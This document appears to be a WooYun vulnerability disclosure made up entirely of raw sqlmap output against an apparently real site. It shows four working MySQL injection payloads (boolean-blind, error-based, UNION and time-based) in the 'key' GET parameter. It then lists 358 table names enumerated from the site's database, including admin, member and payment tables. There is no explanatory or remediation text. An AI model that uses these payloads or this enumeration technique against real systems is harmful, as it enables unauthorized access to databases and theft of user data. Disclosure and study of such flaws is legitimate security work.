WooYun.org

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: catid=0&showbrandid=0&key=a') AND 9678=9678 AND ('ZRHu'='ZRHu&imageField.x=33&imageField.y=9
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: catid=0&showbrandid=0&key=a') AND (SELECT 7319 FROM(SELECT COUNT(*),CONCAT(0x3a636a733a,(SELECT (CASE WHEN (7319=7319) THEN 1 ELSE 0 END)),0x3a656f6b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('MQhu'='MQhu&imageField.x=33&imageField.y=9
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: catid=0&showbrandid=0&key=a') LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a636a733a,0x4e724274516a7242585a,0x3a656f6b3a)#&imageField.x=33&imageField.y=9
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: catid=0&showbrandid=0&key=a') AND SLEEP(5) AND ('UAcu'='UAcu&imageField.x=33&imageField.y=9
---
Database: twxinyang
[358 tables]
+---------------------------------------+
| phome_ecms_article |
| phome_ecms_article_check |
| phome_ecms_article_check_data |
| phome_ecms_article_data_1 |
| phome_ecms_article_doc |
| phome_ecms_article_doc_data |
| phome_ecms_article_doc_index |
| phome_ecms_article_index |
| phome_ecms_download |
| phome_ecms_download_check |
| phome_ecms_download_check_data |
| phome_ecms_download_data_1 |
| phome_ecms_download_doc |
| phome_ecms_download_doc_data |
| phome_ecms_download_doc_index |
| phome_ecms_download_index |
| phome_ecms_flash |
| phome_ecms_flash_check |
| phome_ecms_flash_check_data |
| phome_ecms_flash_data_1 |
| phome_ecms_flash_doc |
| phome_ecms_flash_doc_data |
| phome_ecms_flash_doc_index |
| phome_ecms_flash_index |
| phome_ecms_hotel |
| phome_ecms_hotel_check |
| phome_ecms_hotel_check_data |
| phome_ecms_hotel_data_1 |
| phome_ecms_hotel_doc |
| phome_ecms_hotel_doc_data |
| phome_ecms_hotel_doc_index |
| phome_ecms_hotel_index |
| phome_ecms_info |
| phome_ecms_info_check |
| phome_ecms_info_check_data |
| phome_ecms_info_data_1 |
| phome_ecms_info_doc |
| phome_ecms_info_doc_data |
| phome_ecms_info_doc_index |
| phome_ecms_info_index |
| phome_ecms_infoclass_article |
| phome_ecms_infoclass_download |
| phome_ecms_infoclass_flash |
| phome_ecms_infoclass_hotel |
| phome_ecms_infoclass_info |
| phome_ecms_infoclass_movie |
| phome_ecms_infoclass_news |
| phome_ecms_infoclass_photo |
| phome_ecms_infoclass_shop |
| phome_ecms_infotmp_article |
| phome_ecms_infotmp_download |
| phome_ecms_infotmp_flash |
| phome_ecms_infotmp_hotel |
| phome_ecms_infotmp_info |
| phome_ecms_infotmp_movie |
| phome_ecms_infotmp_news |
| phome_ecms_infotmp_photo |
| phome_ecms_infotmp_shop |
| phome_ecms_movie |
| phome_ecms_movie_check |
| phome_ecms_movie_check_data |
| phome_ecms_movie_data_1 |
| phome_ecms_movie_doc |
| phome_ecms_movie_doc_data |
| phome_ecms_movie_doc_index |
| phome_ecms_movie_index |
| phome_ecms_news |
| phome_ecms_news_check |
| phome_ecms_news_check_data |
| phome_ecms_news_data_1 |
| phome_ecms_news_doc |
| phome_ecms_news_doc_data |
| phome_ecms_news_doc_index |
| phome_ecms_news_index |
| phome_ecms_photo |
| phome_ecms_photo_check |
| phome_ecms_photo_check_data |
| phome_ecms_photo_data_1 |
| phome_ecms_photo_doc |
| phome_ecms_photo_doc_data |
| phome_ecms_photo_doc_index |
| phome_ecms_photo_index |
| phome_ecms_shop |
| phome_ecms_shop_check |
| phome_ecms_shop_check_data |
| phome_ecms_shop_data_1 |
| phome_ecms_shop_doc |
| phome_ecms_shop_doc_data |
| phome_ecms_shop_doc_index |
| phome_ecms_shop_index |
| phome_enewsad |
| phome_enewsadclass |
| phome_enewsadminstyle |
| phome_enewsbefrom |
| phome_enewsbq |
| phome_enewsbqclass |
| phome_enewsbqtemp |
| phome_enewsbqtemp_2 |
| phome_enewsbqtempclass |
| phome_enewsbuybak |
| phome_enewsbuygroup |
| phome_enewscard |
| phome_enewsclass |
| phome_enewsclass_stats |
| phome_enewsclass_stats_ip |
| phome_enewsclass_stats_set |
| phome_enewsclassadd |
| phome_enewsclassf |
| phome_enewsclassnavcache |
| phome_enewsclasstemp |
| phome_enewsclasstemp_2 |
| phome_enewsclasstempclass |
| phome_enewsdiggips |
| phome_enewsdo |
| phome_enewsdolog |
| phome_enewsdownerror |
| phome_enewsdownrecord |
| phome_enewsdownurlqz |
| phome_enewserrorclass |
| phome_enewsf |
| phome_enewsfava |
| phome_enewsfavaclass |
| phome_enewsfeedback |
| phome_enewsfeedbackclass |
| phome_enewsfeedbackf |
| phome_enewsfile_1 |
| phome_enewsfile_member |
| phome_enewsfile_other |
| phome_enewsfile_public |
| phome_enewsgbook |
| phome_enewsgbookclass |
| phome_enewsgfenip |
| phome_enewsgroup |
| phome_enewshmsg |
| phome_enewshnotice |
| phome_enewshy |
| phome_enewshyclass |
| phome_enewsindexpage |
| phome_enewsinfoclass |
| phome_enewsinfotype |
| phome_enewsinfovote |
| phome_enewsjstemp |
| phome_enewsjstemp_2 |
| phome_enewsjstempclass |
| phome_enewskey |
| phome_enewskeyclass |
| phome_enewslink |
| phome_enewslinkclass |
| phome_enewslinktmp |
| phome_enewslisttemp |
| phome_enewslisttemp_2 |
| phome_enewslisttempclass |
| phome_enewslog |
| phome_enewsloginfail |
| phome_enewsmember |
| phome_enewsmember_connect |
| phome_enewsmember_connect_app |
| phome_enewsmemberadd |
| phome_enewsmemberf |
| phome_enewsmemberfeedback |
| phome_enewsmemberform |
| phome_enewsmembergbook |
| phome_enewsmembergroup |
| phome_enewsmemberpub |
| phome_enewsmenu |
| phome_enewsmenuclass |
| phome_enewsmod |
| phome_enewsnewstemp |
| phome_enewsnewstemp_2 |
| phome_enewsnewstempclass |
| phome_enewsnotcj |
| phome_enewsnotice |
| phome_enewspage |
| phome_enewspageclass |
| phome_enewspagetemp |
| phome_enewspagetemp_2 |
| phome_enewspayapi |
| phome_enewspayrecord |
| phome_enewspic |
| phome_enewspicclass |
| phome_enewspl_1 |
| phome_enewspl_set |
| phome_enewsplayer |
| phome_enewsplf |
| phome_enewspltemp |
| phome_enewspltemp_2 |
| phome_enewspostdata |
| phome_enewspostserver |
| phome_enewsprinttemp |
| phome_enewsprinttemp_2 |
| phome_enewspublic |
| phome_enewspublic_update |
| phome_enewspubtemp |
| phome_enewspubtemp_2 |
| phome_enewspubvar |
| phome_enewspubvarclass |
| phome_enewsqmsg |
| phome_enewssearch |
| phome_enewssearchall |
| phome_enewssearchall_load |
| phome_enewssearchtemp |
| phome_enewssearchtemp_2 |
| phome_enewssearchtempclass |
| phome_enewsshop_address |
| phome_enewsshop_ddlog |
| phome_enewsshop_precode |
| phome_enewsshop_set |
| phome_enewsshopdd |
| phome_enewsshopdd_add |
| phome_enewsshoppayfs |
| phome_enewsshopps |
| phome_enewssp |
| phome_enewssp_1 |
| phome_enewssp_2 |
| phome_enewssp_3 |
| phome_enewssp_3_bak |
| phome_enewsspacestyle |
| phome_enewsspclass |
| phome_enewssql |
| phome_enewstable |
| phome_enewstags |
| phome_enewstagsclass |
| phome_enewstagsdata |
| phome_enewstask |
| phome_enewstempbak |
| phome_enewstempdt |
| phome_enewstempgroup |
| phome_enewstempvar |
| phome_enewstempvar_2 |
| phome_enewstempvarclass |
| phome_enewstogzts |
| phome_enewsuser |
| phome_enewsuseradd |
| phome_enewsuserclass |
| phome_enewsuserjs |
| phome_enewsuserjsclass |
| phome_enewsuserlist |
| phome_enewsuserlistclass |
| phome_enewsuserloginck |
| phome_enewsvote |
| phome_enewsvotemod |
| phome_enewsvotetemp |
| phome_enewsvotetemp_2 |
| phome_enewswapstyle |
| phome_enewswfinfo |
| phome_enewswfinfolog |
| phome_enewswords |
| phome_enewsworkflow |
| phome_enewsworkflowitem |
| phome_enewswriter |
| phome_enewsyh |
| phome_enewszt |
| phome_enewsztadd |
| phome_enewsztclass |
| phome_enewsztf |
| phome_enewsztinfo |
| phome_enewszttype |
| phome_enewszttypeadd |
| pwn_advs_duilian |
| pwn_advs_lb |
| pwn_advs_lbgroup |
| pwn_advs_link |
| pwn_advs_linkgroup |
| pwn_advs_logo |
| pwn_advs_movi |
| pwn_advs_pic |
| pwn_advs_pop |
| pwn_advs_text |
| pwn_base_admin |
| pwn_base_adminauth |
| pwn_base_adminmenu |
| pwn_base_adminrights |
| pwn_base_border |
| pwn_base_coltype |
| pwn_base_config |
| pwn_base_pageset |
| pwn_base_pagetemp |
| pwn_base_plus |
| pwn_base_plusdefault |
| pwn_base_plusplan |
| pwn_base_plusplanid |
| pwn_base_plustemp |
| pwn_base_version |
| pwn_comment |
| pwn_comment_cat |
| pwn_comment_config |
| pwn_feedback |
| pwn_feedback_group |
| pwn_feedback_info |
| pwn_hz_cat |
| pwn_hz_con |
| pwn_hz_config |
| pwn_hz_mzone |
| pwn_hz_order |
| pwn_hz_orderitems |
| pwn_hz_pages |
| pwn_hz_prop |
| pwn_job |
| pwn_job_form |
| pwn_job_telent |
| pwn_member |
| pwn_member_buylist |
| pwn_member_cat |
| pwn_member_centlog |
| pwn_member_centrule |
| pwn_member_centset |
| pwn_member_config |
| pwn_member_defaultrights |
| pwn_member_fav |
| pwn_member_friends |
| pwn_member_group |
| pwn_member_msn |
| pwn_member_notice |
| pwn_member_nums |
| pwn_member_onlinepay |
| pwn_member_pay |
| pwn_member_paycenter |
| pwn_member_regstep |
| pwn_member_rights |
| pwn_member_secure |
| pwn_member_type |
| pwn_member_zone |
| pwn_menu |
| pwn_menu_group |
| pwn_news_cat |
| pwn_news_con |
| pwn_news_config |
| pwn_news_downlog |
| pwn_news_pages |
| pwn_news_pcat |
| pwn_news_proj |
| pwn_news_prop |
| pwn_page |
| pwn_page_group |
| pwn_shop_brand |
| pwn_shop_brandcat |
| pwn_shop_cat |
| pwn_shop_con |
| pwn_shop_config |
| pwn_shop_memberprice |
| pwn_shop_order |
| pwn_shop_orderitems |
| pwn_shop_pages |
| pwn_shop_pricerule |
| pwn_shop_prop |
| pwn_shop_vcat |
| pwn_shop_yun |
| pwn_shop_yunzone |
| pwn_tools_code |
| pwn_tools_photopolldata |
| pwn_tools_photopollindex |
| pwn_tools_pollconfig |
| pwn_tools_polldata |
| pwn_tools_pollindex |
| pwn_tools_statbase |
| pwn_tools_statcome |
| pwn_tools_statcount |
| pwn_tools_statdate |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+